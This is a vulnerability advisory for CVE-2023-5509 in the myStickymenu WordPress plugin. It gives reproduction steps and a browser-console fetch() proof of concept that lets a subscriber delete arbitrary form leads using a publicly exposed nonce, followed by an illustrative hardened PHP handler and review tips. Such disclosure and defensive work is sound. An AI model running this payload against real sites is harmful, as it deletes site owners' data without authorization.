myStickymenu < 2.6.5 - Subscriber+ Arbitrary Form Leads Deletion
| Title | Published | Family |
|---|---|---|
| CVE-2023-5509 | 20 Nov 2023 19:15 | cve |
| CVE-2023-5509 | 20 Nov 2023 19:15 | nvd |
| WordPress My Sticky Bar Plugin < 2.6.5 Improper Authorization Vulnerability | 21 Nov 2023 00:00 | openvas |
| CVE-2023-5509 myStickymenu < 2.6.5 - Subscriber+ Arbitrary Form Leads Deletion | 20 Nov 2023 18:55 | cvelist |
| Design/Logic Flaw | 20 Nov 2023 19:15 | prion |
| myStickymenu < 2.6.5 - Subscriber+ Arbitrary Form Leads Deletion | 27 Oct 2023 00:00 | wpvulndb |
1. Visit myStickymenu > + Create new Welcome Bar. Ensure "Collect leads" is enabled, enable the toggle at the top, and Save.
2. In a logged-out window, fill in the lead form in the sticky bar. As an admin, confirm in the dashboard that a lead has been generated, and note its ID.
3. Log in as a subscriber and visit the frontend. In the browser console, run the following code, replacing LEAD_ID with the ID of the lead generated in the previous step. The nonce comes from `welcomebar_frontjs`, the object the plugin exposes to the public front-end script, so any visitor can read it; the `my_sticky_menu_bulks` AJAX action accepts that nonce without checking whether the caller is allowed to manage leads, which is why a subscriber can delete them.

```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  // bulks[] carries the lead ID(s) to delete; the nonce is the public front-end one
  "body": "action=my_sticky_menu_bulks&bulks[]=LEAD_ID&wpnonce=" + welcomebar_frontjs.ajax_nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});
```

4. See that the lead has been deleted.
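The root cause reflected by the PoC above is an AJAX handler that treats a nonce as an authorization check. A nonce only proves the request originated from a page the site served (CSRF protection); when the nonce is handed to every front-end visitor, it says nothing about what the caller may do. The following PHP is an added illustrative example, not the plugin's own source: the handler, hook names, nonce action strings and the `example_delete_lead` helper are all hypothetical, and the real fix shipped in 2.6.5 is not shown on this page. It contrasts the nonce-only pattern with one that also enforces a capability.

```php
<?php
// Added example (hypothetical names), not code from the myStickymenu plugin.

// Vulnerable pattern: the nonce is validated, but that nonce is localized into
// the public front-end script, so any visitor has it. No capability is checked,
// so any authenticated user can delete arbitrary leads.
function example_bulks_vulnerable() {
    check_ajax_referer( 'example_front_nonce', 'wpnonce' ); // dies on bad nonce

    $ids = array_map( 'intval', (array) ( $_POST['bulks'] ?? array() ) );
    foreach ( $ids as $id ) {
        example_delete_lead( $id ); // hypothetical helper
    }
    wp_send_json_success();
}

// Hardened pattern: (1) a nonce that is only emitted on the admin screen,
// (2) an explicit capability check, (3) registration only for logged-in users
// (no wp_ajax_nopriv_ hook), so the action is never reachable anonymously.
function example_bulks_fixed() {
    check_ajax_referer( 'example_admin_bulk_nonce', 'wpnonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // subscribers stop here
    }

    $ids = array_map( 'intval', (array) ( $_POST['bulks'] ?? array() ) );
    $ids = array_filter( $ids, function ( $id ) { return $id > 0; } );
    foreach ( $ids as $id ) {
        example_delete_lead( $id );
    }
    wp_send_json_success( array( 'deleted' => array_values( $ids ) ) );
}

// Hypothetical deletion helper backed by a plugin-owned table.
function example_delete_lead( $id ) {
    global $wpdb;
    $wpdb->delete( $wpdb->prefix . 'example_leads', array( 'id' => $id ), array( '%d' ) );
}

add_action( 'wp_ajax_example_bulks', 'example_bulks_fixed' );

// The admin-only nonce is emitted on the plugin's settings page, not on the
// public front end, so ordinary visitors never receive it.
add_action( 'admin_enqueue_scripts', function ( $hook ) {
    wp_localize_script( 'example-admin-js', 'example_admin', array(
        'ajax_nonce' => wp_create_nonce( 'example_admin_bulk_nonce' ),
    ) );
} );
```

When reviewing a plugin for this class of bug, grep for `wp_ajax_` hooks and check each handler for a `current_user_can()` call in addition to `check_ajax_referer()`; a nonce that is also passed through `wp_localize_script()` on the front end is a strong signal that the check is not an authorization boundary.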